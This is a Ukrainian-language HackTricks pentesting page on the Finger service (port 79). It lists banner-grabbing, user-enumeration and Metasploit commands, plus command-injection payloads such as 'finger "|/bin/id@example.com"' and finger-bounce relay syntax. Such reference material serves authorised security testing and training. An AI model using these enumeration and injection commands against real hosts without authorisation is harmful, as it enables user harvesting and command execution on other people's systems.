# 79 - Пентестинг Finger
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)!
* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com)
* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family)
* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**.
## **Основна інформація**
Програма/сервіс **Finger** використовується для отримання деталей про користувачів комп'ютера. Зазвичай надана інформація включає **логін користувача, повне ім'я**, а також у деяких випадках додаткові деталі. Ці додаткові деталі можуть включати місце розташування офісу та номер телефону (якщо доступно), час, коли користувач увійшов у систему, період неактивності (час простою), останній раз, коли користувач переглядав пошту, а також вміст файлів плану та проекту користувача.
**Порт за замовчуванням:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Перелік**
### **Отримання банера/Основне з'єднання**
```bash
nc -vn 79
echo "root" | nc -vn 79
```
### **Перелік користувачів**
```bash
finger @ #List users
finger admin@ #Get info of user
finger user@ #Get info of user
```
Альтернативно, ви можете використовувати **finger-user-enum** від [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), деякі приклади:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap виконує скрипт для використання стандартних скриптів**
### Metasploit використовує більше трюків, ніж Nmap
```
use auxiliary/scanner/finger/finger_users
```
### Shodan
* `port:79 КОРИСТУВАЧ`
## Виконання команд
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Finger Bounce
[Використовуйте систему як реле для finger](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)!
* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com)
* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family)
* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**.